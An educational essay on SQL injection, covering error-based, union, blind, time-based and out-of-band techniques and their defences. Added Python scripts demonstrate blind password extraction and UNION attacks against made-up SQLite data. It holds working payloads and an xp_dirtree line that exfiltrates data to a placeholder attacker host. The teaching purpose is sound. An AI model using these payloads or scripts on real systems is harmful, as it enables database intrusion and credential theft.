SQL Injection

Subject area: Computer science essays
Published: December 26, 2019*

Abstract

This paper investigates Structured Query Language (SQL) injection from a web security standpoint. SQL injection consists of an attacker inserting malicious SQL into an application's input so that it alters how the application interacts with its database. The injected statements may create, read, update or delete data in the database.

SQL injection is dangerous because attackers use it to reveal confidential and proprietary data, delete or otherwise damage important data, steal data for monetary and other gain, or even deny service, up to and including full system compromise.

Since awareness is the first line of defense, this paper describes each type of SQL injection attack and how it makes a web application vulnerable, what an attacker might do to exploit the vulnerability, and the measures that can be taken to prevent and contain it. Not every SQL injection attempt can be stopped, but penetration of the system can be minimized if development proceeds with these vulnerabilities in mind.

Real-world examples of SQL injection are also highlighted, showing the full impact of these attacks and how they could have been avoided had some of these measures been taken. Knowing how attackers have actually used the technique illustrates the importance of protecting against SQL injection.

SQL Injection Attacks

“A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.” (OWASP, 2016).

Most web forms have no mechanism to restrict what is entered beyond the names and passwords they expect. Unless precautions are taken, an attacker can use the input boxes to send their own requests to the database, which could allow them to download the entire database or interact with it in other illicit ways.

SQL injection attacks continued to be heavily utilized by attackers as part of the significant rise in web application attacks. This attack vector increased 62% year over year and 19% quarter over quarter. The increase in web application attacks, particularly "injection" attacks like SQLi, should come as no surprise: the OWASP Top 10 2017, released in November 2017, ranks "injection" (inclusive of SQLi) as the top vulnerability category. This iteration was the first major update to the OWASP Top 10 since 2013, when "injection" also held the top spot (Cilliers, 2017).

Automated SQL injection tools are now widely available, making it easier for an attacker to carry out the attack and increasing its scope. In the past, attackers had to type SQL into web applications by hand to accomplish this.

Different Types of SQL Injection

All SQL injection (SQLi) attacks can be classified into two major categories: data selection and data manipulation. Data selection is injecting SQL to retrieve data that the web application does not authorize the user to see. Data manipulation is using SQL injection to alter data in the database in an unauthorized fashion.

Within those categories the attacks can be broken into three subcategories by method of attack: in-band SQLi, inferential SQLi and out-of-band SQLi. Each of these is broken down further in the following sections.

In-band SQLi

In-band SQL injection is the most common and easiest to exploit of the SQL injection attacks. It occurs when an attacker is able to use the same communication channel both to launch the attack and to gather the results (Muscat, 2015). It is also referred to as classic SQLi. There are generally two types of in-band SQLi: error-based SQLi and union-based SQLi.

Error-based SQLi

Error-based SQLi is an in-band SQL injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database (Muscat, 2015). The attacker keeps sending injected SQL and, from the way the interpreter responds, can by trial and error map the entire structure of the database.

A typical example of error-based SQLi is appending to the URL of a page that carries data in its query string. For instance, imagine a web application that sells books at www.notamazon.com. When a visitor selects a book title from the page, the book is loaded from a URL such as www.notamazon.com?id=34.

It can be surmised that id identifies the selected book. The attacker appends some SQL to the URL and resubmits the page; if the application displays raw database errors, the error text itself leaks data. Against a MySQL backend the URL might become www.notamazon.com?id=34 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- and the server returns an error of the form "Duplicate entry '4.3.45-log:1' for key 'group_key'". The attacker has used the error message to read the database version: the GROUP BY/rand() construction deliberately forces a duplicate-key error whose text contains whatever expression was placed inside concat_ws().

This can be repeated with different expressions, each producing a different error message, to map the layout of the database: the database name, then the table names, then the column names of a chosen table. With this information data can be extracted from the database. The same injection point can also be used to modify data.

Union-based SQLi

Union-based injection uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result set. For example, to extract data from another table in the same database one can append a UNION SELECT to the original query. The following example illustrates how this is done: www.notamazon.com?id=34 AND 1=2 UNION SELECT username, password, 1 FROM members. Assuming the database has a members table, this returns all usernames and passwords from it in place of the product data. Notice the false condition (1=2) added to the WHERE clause of the original query before the UNION operator; this is common practice when extracting data, to ensure that the results come only from the injected SELECT ("SQL Injection Using UNION," 2018). A UNION only succeeds when the injected SELECT returns the same number of columns as the original query (hence the filler value 1 above) with compatible types, so an attacker first determines the column count, typically by appending ORDER BY n for increasing n, or UNION SELECT NULL, NULL, ... with more NULLs, until the database stops returning an error.

Inferential SQLi (Blind SQLi)

Inferential SQLi (blind SQLi) takes longer to exploit but is just as dangerous as in-band SQLi. In this attack no database content is returned through the web application's responses, and the attacker never sees the query results directly. Instead, the attacker reconstructs the database structure and contents by sending payloads and observing the web application's response and the resulting behaviour of the database server (Muscat, 2015). The two types of inferential SQL injection are Boolean-based blind SQLi and time-based blind SQLi.

Boolean-based Blind SQLi

Boolean based (content-based) Blind SQLi is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result (Muscat, 2015).

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned (Muscat, 2015).

An example is http://www.notamazon.com?id=34 and (select count(id) from members). The injected condition asks whether a table named members exists: if the normal product page is returned, the subquery succeeded, the condition was TRUE, and the table exists; if the table does not exist, the query fails and the page changes or shows nothing. The same method can be used to guess column names, since a guess that returns the normal page (TRUE) was correct. Once the table and column names are known, the contents can be recovered by probing each character of each value in turn, one yes/no question at a time, until the whole value is discovered.
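The following Python script is an added example, not part of the original essay. It builds a constructed in-memory SQLite database standing in for the bookshop's backend and a simulated vulnerable page for www.notamazon.com?id=... that tells the caller only whether a product was shown or not. Using nothing but that one-bit signal it confirms that a members table exists and then recovers the administrator's password, first learning its length and then each character by binary search over its character code. The table, column names and the credential are all constructed for the demonstration; SQLite's unicode() and substr() play the role MySQL's ASCII() and SUBSTRING() would in a real attack.

```python
import sqlite3

# Constructed stand-in for the bookshop's database (not real data).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO products VALUES (34, 'Constructed Book Title');
INSERT INTO members VALUES (1, 'admin', 'Tr0ub4dor');
""")

REQUESTS = 0  # counts simulated HTTP requests, to show what blind extraction costs


def product_page(id_param: str) -> bool:
    """Simulated vulnerable page behind www.notamazon.com?id=<id_param>.

    The parameter is concatenated straight into the query. The caller learns only
    whether a product page was rendered (True) or a generic 'not found' / error
    page came back (False); no database content is ever returned to the attacker.
    """
    global REQUESTS
    REQUESTS += 1
    sql = "SELECT title FROM products WHERE id = " + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are hidden behind a generic page, so they read as FALSE


def oracle(condition: str) -> bool:
    """Ask the application one yes/no question about the database."""
    return product_page(f"34 AND ({condition})")


def table_exists(name: str) -> bool:
    # A subquery against a missing table fails, which the page turns into FALSE.
    return oracle(f"(SELECT count(*) FROM {name}) >= 0")


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Recover the text value of the scalar subquery `expr` using only TRUE/FALSE.

    Step 1 finds the length; step 2 finds each character by binary search over
    its code (0..127), so each character costs about seven requests instead of
    one request per candidate character.
    """
    length = next((n for n in range(max_len + 1) if oracle(f"length(({expr})) = {n}")), None)
    if length is None:
        raise ValueError("value longer than max_len, or the probe is not working")
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    print("members table exists:", table_exists("members"))
    secret = blind_extract("SELECT password FROM members WHERE username = 'admin'")
    print("recovered:", secret, "in", REQUESTS, "requests")
```

Because the page collapses database errors into the same FALSE answer as a genuine miss, every probe must be phrased so that TRUE is only reachable when the guess is right; that is also why blind extraction is slow and noisy enough that attackers automate it, and why the request count is worth watching in server logs.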

Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE (Muscat, 2015).

Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned (Muscat, 2015).

An example of time-based SQLi against MySQL is SELECT * FROM products WHERE id = 34 AND if(1=1, sleep(10), false). If the response is delayed by 10 seconds the web application is vulnerable. Replacing 1=1 with a condition about the data (for example a comparison of one character of a value) and repeating the request turns the delay into a one-bit answer, and with enough such requests the contents of the database can be derived by brute force. The syntax is engine-specific: PostgreSQL uses pg_sleep() and SQL Server uses WAITFOR DELAY.

Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results (Muscat, 2015).

Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable) (Muscat, 2015).

An example of out-of-band SQLi against Microsoft SQL Server is SELECT * FROM products WHERE id=1; EXEC master..xp_dirtree '\\attacker.example\share'. This relies on the database driver accepting stacked (batched) statements, so that the injected text runs as a second statement, and on the database account having permission to execute extended stored procedures. xp_dirtree lists the contents of a directory; given a UNC path it makes the database server itself resolve and connect to the named host, which is how the attacker receives the signal. By building the hostname from a subquery (for example by concatenating the result of SELECT @@version into it), the attacker can carry stolen data out in DNS requests made by the database server, with nothing ever appearing in the web application's own response. The hostname attacker.example here is a placeholder.

Prevention

No single control eliminates SQL injection. The measures below work at different layers: validating input, placing the application behind a web application firewall, restricting database privileges, parameterizing queries, hardening the database server, limiting what error messages disclose, and monitoring queries in production. Of these, parameterized queries address the root cause; the others limit what an attacker can achieve when something is missed.

Input type checking is the practice of ensuring that user data in a web application is filtered for its context. For example, email addresses should be restricted to the characters allowed in an e-mail address, phone numbers to the characters allowed in a phone number, and so on. Regular expressions are a common way to perform this check (Halfond, 6).

Blacklist validation and whitelist validation are further ways to reduce SQLi exposure. Blacklist validation rejects input that matches a list of known bad patterns; whitelist validation accepts input only if it has the expected data type, length, range and format, with regular expressions often used for the format check (kurinchilamp, 2012). Blacklists are easy to bypass with encodings, comments and keyword variations the list did not anticipate, so whitelist validation is preferred, and neither replaces parameterized queries.

A regular expression is a sequence of characters that defines a search pattern; the pattern is applied to a string and reports whether it matches. The following Java method validates that a string is a well-formed email address: it returns true if the string matches the pattern and false otherwise.

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class EmailValidator {
        // Whitelist check: matches() requires the whole input to fit the pattern,
        // so stray characters anywhere in the string cause rejection.
        public static boolean isValidEmailAddress(String emailAddress) {
            if (emailAddress == null) {
                return false;
            }
            String expression = "[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
                + "@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?";
            Pattern pattern = Pattern.compile(expression, Pattern.CASE_INSENSITIVE);
            Matcher matcher = pattern.matcher(emailAddress);
            return matcher.matches();
        }
    }

Use a web application firewall (WAF). A WAF applies a set of rules to filter potentially dangerous web requests, and its SQL injection rules can catch many attempts to sneak SQL through user input. It is a compensating control: rule sets can be bypassed, so a WAF should complement parameterized queries rather than replace them.

Employ the principle of least privilege by creating multiple database accounts, each with the minimum privileges its usage environment requires. An account that only needs to read product data, for example, should have no write access to other tables and no permission to run administrative procedures. Limit access so that a breach of one system cannot be leveraged to compromise the entire database.

Do not construct SQL queries from user input. Even data sanitization routines can be flawed. Parameterizing all SQL, binding variables through prepared statements or stored procedures, is much safer than assembling full query strings. In Java it is possible to build a SQL statement by concatenating strings and sending the result to the database. Here is an example:

    String query = "SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = '" + username + "'";

This string is then sent to the database and executed, returning the username and password of the matching user. If username comes directly from a web form, whatever the user typed becomes part of the SQL. An attacker who enters ' OR '1'='1 as the username causes the following query string to be constructed:

    SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = '' OR '1'='1';

The condition is now true for every row, so every username and password in the table is returned. If instead the SQL is parameterized as follows, the attacker's input is bound as a plain string value, the placeholder is never interpreted as SQL, and the query simply matches no user (or only a user literally named ' OR '1'='1):

    String query = "SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = ?";

The value is supplied separately, for example through PreparedStatement.setString(1, username), so the database receives the query structure and the data through different channels and cannot confuse one for the other.
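The following Python script is an added example, not part of the original essay, and it runs the same comparison as the Java fragments above against a constructed in-memory SQLite database (the users and api_keys tables and all values are made up for the demonstration). It shows the concatenated query returning every row for the ' OR '1'='1 input, the column-count discovery step that the union-based section describes followed by a UNION SELECT pulling rows out of an unrelated table, and then the parameterized version treating the same payloads as nothing more than an unusual username. Python's sqlite3 module is used in place of JDBC; the ? placeholder is the same.

```python
import sqlite3

# Constructed stand-in for the application's database (not real credentials).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (username TEXT, password TEXT);
CREATE TABLE api_keys (owner TEXT, secret TEXT);
INSERT INTO users VALUES ('alice', 'pw-alice'), ('bob', 'pw-bob'), ('walter', 'pw-walter');
INSERT INTO api_keys VALUES ('svc', 'sk_constructed_0001');
""")


def lookup_vulnerable(username: str) -> list:
    """Same construction as the essay's Java example: the form value is spliced
    into the SQL text, so a quote in the input changes the query's structure."""
    query = "SELECT username, password FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(username: str) -> list:
    """Parameterized version: the statement text is fixed and the value travels
    separately, so a quote in the input is just a character inside a string."""
    query = "SELECT username, password FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def find_column_count(max_cols: int = 10) -> int:
    """UNION only works when the injected SELECT has as many columns as the
    original. Attackers discover the count by adding NULLs until the database
    stops returning a column-mismatch error."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + " --"
        try:
            lookup_vulnerable(payload)
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count not found within max_cols")


if __name__ == "__main__":
    print(lookup_vulnerable("walter"))                   # intended behaviour: one row
    print(lookup_vulnerable("' OR '1'='1"))              # every row in the table
    print(find_column_count())                           # 2
    print(lookup_vulnerable("' UNION SELECT owner, secret FROM api_keys --"))  # another table
    print(lookup_safe("' OR '1'='1"))                    # [] : the payload is just a username
```

Note that sqlite3's execute() accepts only a single statement, so a stacked payload like the one in the out-of-band section would be rejected by this driver outright; stacked injection is a concern with drivers and servers that permit batched statements, which is one more setting worth checking in the database configuration.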

Eliminate unnecessary database capabilities that allow users to escalate database privileges and those that spawn command shells or reach out to the network (the extended stored procedures used in the out-of-band example are one case). Regularly apply software patches: because SQL injection vulnerabilities are regularly identified in commercial software, it is important to stay up to date.

Suppress error messages so that they give minimal information. Error messages are an important reconnaissance tool for attackers, so make them as generic as possible and reveal nothing about the web application or the databases it uses. For example, if a web form has multiple fields and every field is checked, do not return a different error message depending on which field is invalid; different messages let an attacker identify which fields are wrong and, by trial and error, work out correct values.

Make sure that error logs are not easily available to an attacker.

Monitor SQL statements from database-connected applications continuously. This will help identify rogue SQL statements and vulnerabilities. Monitoring tools that utilize machine learning and/or behavioral analysis can be especially useful.

Anatomy of a SQL Injection Breach

In May 2017, the online building products supplier Construction Materials Online was fined £55,000 by the Information Commissioner's Office (ICO), an amount equal to 5% of its net worth, for failing to have appropriate technical measures in place to prevent an attack on its customers' cardholder details. Three years earlier, an attacker had used SQL injection to access 669 unencrypted cardholder records, including names, addresses, account numbers and even security codes. The ICO also found that the supplier had failed to carry out regular penetration testing of its ecommerce website, failed to ensure that system passwords were complex enough to resist brute-force attacks, and failed to keep patches up to date (Shah, 2017).

Conclusion

Implementing any of these defenses reduces the chances of a successful SQL injection attack; implementing all of them provides a high degree of protection. However widespread the attack is, web applications do not have to fall victim to it.

SQLi precautions should be applied throughout the entire development life cycle of a web application. Defenses need to be integrated while the application is being built rather than added as an afterthought, and they should run throughout the application rather than being placed at a few key points in an attempt to intercept rogue SQL statements.

References

OWASP. (2016, April 10). SQL Injection. Retrieved February 16, 2018, from https://www.owasp.org/index.php/SQL_Injection

Quora. (n.d.). How many types of SQL injections are there? Retrieved February 16, 2018, from https://www.quora.com/How-many-types-of-SQL-injections-are-there

SQL Injection Using UNION. (2018). Retrieved March 12, 2018, from http://www.sqlinjection.net/union/

Cilliers, H. (2017, December 06). Report: Web application attacks continued to rise in 2017. Retrieved April 16, 2018, from https://accountingweekly.com/report-web-application-attacks-continued-rise-2017/

Muscat, I. (2015). SQLi part 4: In-band SQLi (classic SQLi). Acunetix. Retrieved from https://www.acunetix.com/blog/articles/sqli-part-4-in-band-sqli-classic-sqli/

Halfond, W. G. J., Viegas, J., & Orso, A. (2006). A classification of SQL injection attacks and countermeasures. Proceedings of the International Symposium on Secure Software Engineering (ISSSE 2006). College of Computing, Georgia Institute of Technology. https://www.cc.gatech.edu/fac/Alex.Orso/papers/halfond.viegas.orso.ISSSE06.pdf

Kaushik, A. (2013). Sailing Safe in Cyberspace: Protect Your Identity and Data.

Kurinchilamp. (2012, September 9). SQL Injection: Whitelist validation vs. blacklist validation. Retrieved from http://kurinchilamp.kurinchilion.com/2012/09/sql-injection-whitelist-validation-vs-blacklist-validation.html

Source: Essay Sauce, SQL Injection. Available from: https://www.essaysauce.com/computer-science-essays/sql-injection/ [Accessed 18-05-21].

* This essay may have been previously published on Essay.uk.com at an earlier date.